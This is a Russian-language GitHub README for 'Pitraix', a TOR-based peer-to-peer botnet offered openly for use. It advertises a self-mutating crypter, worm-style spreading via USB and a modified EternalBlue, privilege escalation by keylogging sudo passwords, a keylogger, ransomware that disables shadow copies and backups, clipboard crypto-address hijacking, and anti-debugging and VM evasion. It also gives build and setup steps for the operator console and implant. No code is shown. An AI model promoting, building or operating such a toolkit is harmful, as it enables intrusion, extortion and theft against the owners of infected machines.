Skip to content

Latest commit

 

History

History
116 lines (66 loc) · 8.94 KB

README.ru.md

File metadata and controls

116 lines (66 loc) · 8.94 KB

Я не несу ответственности за любой ущерб, который вы нанесете, используя это!

Питра

  • Современный кроссплатформенный P2P-ботнет на основе HTTP через TOR, который невозможно отследить.

  • Дизайн основан на «нулевом доверии», даже злоумышленники не могут причинить никакого вреда, защищая личность оператора. для получения дополнительной технической информации проверьте spec.txt

  • Pitraix может обслуживать миллионы хостов, предел пропускной способности сети TOR

  • Вы можете запустить Pitraix на тостере, и он все равно будет работать так же хорошо с указанными миллионами хостов, поскольку оперативник - это тот, кто отправляет запросы, а не получает их, и потому что нет C2.

Встроенный криптер и самораспространяющийся

  • Pitraix имеет возможность самостоятельно модифицировать собственный код, что приводит к совершенно другому исполняемому файлу с точки зрения хэша при каждом новом заражении.

  • Все делается автоматически и не требует вмешательства оператора.

Кроссплатформенный с некоторыми хитрыми 1-days

  • Pitraix работает как с Windows 7, так и с Windows 11, а также с Linux.

  • у него есть возможность автоматически повышать привилегии на обеих платформах

  • в Linux это делается с помощью пароля кейлогинга, когда пользователь запускает «sudo» или «doas»

  • в Windows используется модифицированная версия UACME (в разработке)

  • *Поддержка BSD находится в стадии разработки

Динамическое поведение

  • Pitraix автоматически выбирает разные места сохранения на каждом хосте, а также имена конфигурационных файлов, собственное имя pitraix и многое другое генерируются динамически, чтобы сбить с толку антивирусы.

Анонимно и безопасно

  • Pitraix закодирован на Golang, который безопасен для памяти и очень быстр. он используется такими важными компаниями, как Google, Banks, Discord и т. д.

  • Pitraix закодирован с учетом дополнительной безопасности, чтобы защитить как одноранговый узел, так и оператора.

  • Хозяева не знают друг друга. Даже их луковый адрес TOR

  • Агенты - это хосты, которым были предоставлены луковые адреса TOR других хостов, агенты передают инструкции от оперативника к хостам. для получения дополнительной технической информации проверьте spec.txt

  • Оперативники маскируются под агентов для защиты от продвинутых сетевых атак и пакетных атак через TOR.

Функции

  • Современное шифрование с использованием AES-256 и криптографии с открытым ключом

  • Одноранговая сеть через TOR

  • Динамическое поведение

  • Встроенный шифровальщик

  • Встроенный кейлоггер, который выбирает только интересные вещи

  • Встроенная программа-вымогатель, которая никогда не хранит ключи на HOST (я не несу ответственности за то, как вы это используете)

  • Автоматическое отключение резервного копирования, такого как Volume Shadow Copy, OneDrive и Windows Backup.

  • Автоматическое распространение на USBS, модифицированную версию EternalBlue и кучу других однодневок

  • Возможность захвата криптоадресов в буфере обмена

  • Читабельный код легко модифицировать, не много разрозненных файлов

  • Красочный терминальный интерфейс для оперативников

  • НУЛЕВОЕ чтение/запись в реестр, что снижает обнаружение

  • Обнаружение анти-отладки на основе времени

  • Расширенное обнаружение ВМ

  • Чрезвычайно низкие требования к системе и интернету

  • Возможность захвата событий. События — это все, что происходит на хост-компьютере, в настоящее время оно привязано только к кейлоггеру.

  • Возможность захвата журналов. Журналы в основном используются для отладки поведения и ошибок.

Изображение рабочего OPER

Доверять

  • Для моего ключа GPG проверьте gpg.txt

  • Любой, кто выдает себя за меня и не подписывает сообщение этим ключом, НЕ Я.

Поддерживать

  • Этот проект полностью разработан мной в свободное время, если вы хотите поддержать меня, чтобы я продолжал обновляться, лучше всего сделать пожертвование.

  • Monero: 85HjZpxZngajAEy2123NuXgu1PnNyq2DLSkkr93cyT8QQVae1GruhL4hHAtnaFqeCF7Vo9eW2P11Sig8DDqzVzCSE95NaW6

  • Биткойн (segwit): bc1q2dqk9u06vv2j5p6yptj9ex7epfv77sxjygnrnw

Настройка

  • Загрузите последнюю версию Go для вашей платформы
  • Загрузите файлы из релизов и убедитесь, что они все находятся в одной папке
  • Скомпилируйте lyst для платформы, которую вы хотите
  • Скомпилируйте OPER (НЕ запускайте OPER.go! вместо этого скомпилируйте его, ТОГДА запустите исполняемый файл
  • После первого запуска OPER должен автоматически генерировать и встраивать ключи RSA и адреса TOR в исполняемый файл lyst.
  • OPER автоматически установит TOR. Убедитесь, что на вашем устройстве еще не запущена скрытая служба.

Помощь

  • Введите "help" в OPER для списка команд

Технический

  • Пожалуйста, убедитесь, что вы прочитали spec.txt для получения дополнительной технической информации.
  • Если это немного медленно, это связано с сетью TOR, ожидается, что сеть TOR скоро будет обновлена, и, следовательно, скорость должна быть значительно улучшена.
  • Бинарный файл TOR от Torproject (который использует Pitraix) подписан и, таким образом, не влияет негативно на скорость обнаружения

Определение будущего и терминов

  • Пожалуйста, прочитайте spec.txt для списка терминов и их соответствующего значения, а также массу полезной информации для всех, кто даже думает о редактировании исходного кода.